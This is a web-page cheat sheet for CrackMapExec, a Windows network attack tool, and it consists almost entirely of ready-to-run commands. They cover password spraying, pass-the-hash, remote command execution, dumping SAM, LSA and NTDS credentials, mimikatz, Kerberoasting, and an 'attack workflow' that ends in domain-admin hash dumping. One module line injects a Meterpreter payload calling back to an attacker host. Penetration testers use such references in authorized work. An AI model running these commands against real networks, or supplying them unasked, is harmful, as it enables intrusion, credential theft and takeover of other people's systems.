CrackMapExec (CME) is the Swiss Army knife for Windows network pentesting. It automates credential spraying, lateral movement, and post-exploitation across entire subnets in a single command.
Installation pip install crackmapexec pip install git+https://github.com/Porchetta-Industries/CrackMapExec docker pull byt3bl33d3r/crackmapexec cme --help crackmapexec --help
Protocol Syntax crackmapexec <protocol> <target> [options]
SMB — Core Protocol crackmapexec smb 192.168.1.0/24 crackmapexec smb 192.168.1.100 -u Administrator -p 'Password123' crackmapexec smb 192.168.1.100 -u Administrator -H NT_HASH crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' crackmapexec smb 192.168.1.0/24 -u Administrator -p passwords.txt crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt --no-bruteforce crackmapexec smb 192.168.1.0/24 -u users.txt -H hashes.txt crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt 2>/dev/null | grep -v "[-]"
Shares and Files crackmapexec smb 192.168.1.100 -u user -p pass --shares crackmapexec smb 192.168.1.100 -u user -p pass -M spider_plus -o SHARE=share_name crackmapexec smb 192.168.1.0/24 -u user -p pass -M spider_plus crackmapexec smb 192.168.1.100 -u user -p pass --get-file "\\path\\to\\file" /local/path crackmapexec smb 192.168.1.100 -u user -p pass --put-file /local/file "\\remote\\path"
Command Execution crackmapexec smb 192.168.1.100 -u Administrator -p pass -x "whoami" crackmapexec smb 192.168.1.100 -u Administrator -p pass -X "Get-Process" crackmapexec smb 192.168.1.0/24 -u Administrator -p pass -x "ipconfig" crackmapexec smb 192.168.1.100 -u admin -p pass -x "cmd" --exec-method wmiexec
Credential Dumping crackmapexec smb 192.168.1.100 -u admin -p pass --sam crackmapexec smb 192.168.1.100 -u admin -p pass --lsa crackmapexec smb DC_IP -u admin -p pass --ntds crackmapexec smb DC_IP -u admin -p pass --ntds --ntds-pwdLastSet crackmapexec smb 192.168.1.100 -u admin -p pass -M mimikatz crackmapexec smb 192.168.1.100 -u admin -p pass -M dpapi
Modules crackmapexec smb -L crackmapexec smb 192.168.1.100 -u admin -p pass -M <module_name> crackmapexec smb 192.168.1.100 -u admin -p pass -M module_name -o KEY=value
Useful Modules crackmapexec smb 192.168.1.100 -u admin -p pass -M enum_av crackmapexec smb 192.168.1.100 -u admin -p pass -M get_netconnections crackmapexec smb 192.168.1.100 -u admin -p pass -M ioxidresolver crackmapexec smb 192.168.1.100 -u admin -p pass -M webdav crackmapexec smb 192.168.1.100 -u admin -p pass -M drop-sc crackmapexec smb 192.168.1.100 -u admin -p pass -M empire_exec -o LISTENER=http crackmapexec smb 192.168.1.100 -u admin -p pass -M met_inject -o LHOST=ATTACKER LPORT=4444
LDAP Protocol crackmapexec ldap 192.168.1.100 -u user -p pass --get-sid crackmapexec ldap DC_IP -u user -p pass --users crackmapexec ldap DC_IP -u user -p pass --groups crackmapexec ldap DC_IP -u user -p pass --computers crackmapexec ldap DC_IP -u user -p pass --pass-pol crackmapexec ldap DC_IP -u user -p pass --kerberoasting kerberoast.txt crackmapexec ldap DC_IP -u user -p pass --asreproast asreproast.txt
WinRM Protocol WinRM = Windows Remote Management (PowerShell Remoting):
crackmapexec winrm 192.168.1.100 -u Administrator -p pass crackmapexec winrm 192.168.1.100 -u Administrator -p pass -x "whoami" evil-winrm -i 192.168.1.100 -u Administrator -p pass
MSSQL Protocol crackmapexec mssql 192.168.1.100 -u sa -p password crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT @@version" crackmapexec mssql 192.168.1.100 -u sa -p pass -M mssql_priv crackmapexec mssql 192.168.1.100 -u sa -p pass -x "whoami" crackmapexec mssql 192.168.1.100 -u sa -p pass -q "SELECT BulkColumn FROM OPENROWSET(BULK 'C:\Windows\win.ini', SINGLE_BLOB) x"
Database — Track Findings CME uses a SQLite database to track findings:
cmedb hosts creds creds add smb user pass shares
Output and Logging crackmapexec smb 192.168.1.0/24 -u admin -p pass > output.txt 2>&1 crackmapexec smb 192.168.1.0/24 -u admin -p pass --log output.log crackmapexec smb 192.168.1.0/24 -u users.txt -p passwords.txt | grep "+"
Common Attack Workflow crackmapexec smb 192.168.1.0/24 crackmapexec ldap DC_IP -u validuser -p password --pass-pol crackmapexec smb 192.168.1.0/24 -u users.txt -p 'Winter2024!' --continue-on-success crackmapexec smb owned_hosts.txt -u admin -p pass --sam --lsa crackmapexec smb 192.168.1.0/24 -u new_users.txt -H hashes.txt crackmapexec smb DC_IP -u DA_user -H DA_HASH --ntds
No comments yet. Be the first.